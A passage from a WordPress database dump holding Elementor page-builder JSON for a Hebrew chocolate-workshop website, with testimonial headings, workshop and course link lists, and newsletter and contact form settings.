,\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6478920\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#2d2d2d\"},\"elements\":[{\"id\":\"1db1127\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c5bd98f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05dc \\u05d4\\u05d6\\u05db\\u05d5\\u05d9\\u05d5\\u05ea \\u05e9\\u05de\\u05d5\\u05e8\\u05d5\\u05ea 2018 (c) - \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U<\\/p>\",\"text_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"88ba40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3f463b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: left;\\\">\\u05e9\\u05de\\u05d5\\u05dc: <span style=\\\"color: #ff9900;\\\"><a style=\\\"color: #ff9900;\\\" href=\\\"https:\\/\\/www.shmul.co.il\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u05e7\\u05d9\\u05d3\\u05d5\\u05dd \\u05d0\\u05ea\\u05e8\\u05d9\\u05dd \\u05d0\\u05d5\\u05e8\\u05d2\\u05e0\\u05d9<\\/a><\\/span><\\/p>\",\"text_color\":\"#fcfcfc\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(942,193,'_elementor_version','0.4'),(948,194,'_wp_page_template','elementor_canvas'),(949,194,'_elementor_edit_mode','builder'),(950,194,'_elementor_data','[{\"id\":\"6cdfedca\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"6625c0b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"55d792de\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36ec065f\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"23726b2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5dc24645\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e6a36e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"56533f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b6e992\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4 \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3U4\",\"header_size\":\"h1\",\"align\":\"right\",\"title_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41a38a9\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_t